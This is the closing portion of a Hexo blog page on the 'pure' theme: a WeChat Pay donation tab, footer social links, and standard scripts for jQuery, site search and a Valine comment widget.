                <a href="#wechatpay" role="tab" id="wechatpay-tab" data-toggle="tab" aria-controls="wechatpay" aria-expanded="false"><i class="icon icon-wepay"></i> 微信支付</a>
              </li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>



</main>

  <footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
	
	
    <ul class="social-links">
    	
        <li><a href="/GXA111666" target="_blank" title="VX" data-toggle=tooltip data-placement=top><i class="icon icon-VX"></i></a></li>
        
        <li><a href="/1252195810" target="_blank" title="QQ" data-toggle=tooltip data-placement=top><i class="icon icon-QQ"></i></a></li>
        
        <li><a href="/1252195810@qq.com" target="_blank" title="E-Mail" data-toggle=tooltip data-placement=top><i class="icon icon-E-mail"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    <div class="copyright">
    	
        <div class="publishby">
        	Theme by <a href="https://github.com/cofess" target="_blank"> cofess </a>base on <a href="https://github.com/cofess/hexo-theme-pure" target="_blank">pure</a>.
        </div>
    </div>
</footer>
  <script src="//cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>

<script src="/js/plugin.min.js"></script>


<script src="/js/application.js"></script>


    <script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: '文章',
            PAGES: '页面',
            CATEGORIES: '分类',
            TAGS: '标签',
            UNTITLED: '(未命名)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>






   




   
    
  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/valine"></script>
  <script type="text/javascript">
  var GUEST = ['nick', 'mail', 'link'];
  var meta = 'nick,mail,link';
  meta = meta.split(',').filter(function(item) {
    return GUEST.indexOf(item) > -1;
  });
  new Valine({
    el: '#vcomments',
    verify: false,
    notify: false,
    appId: '',
    appKey: '',
    placeholder: 'Just go go',
    avatar: 'mm',
    meta: meta,
    pageSize: '10' || 10,
    visitor: false
  });
  </script>

     







</body>
</html>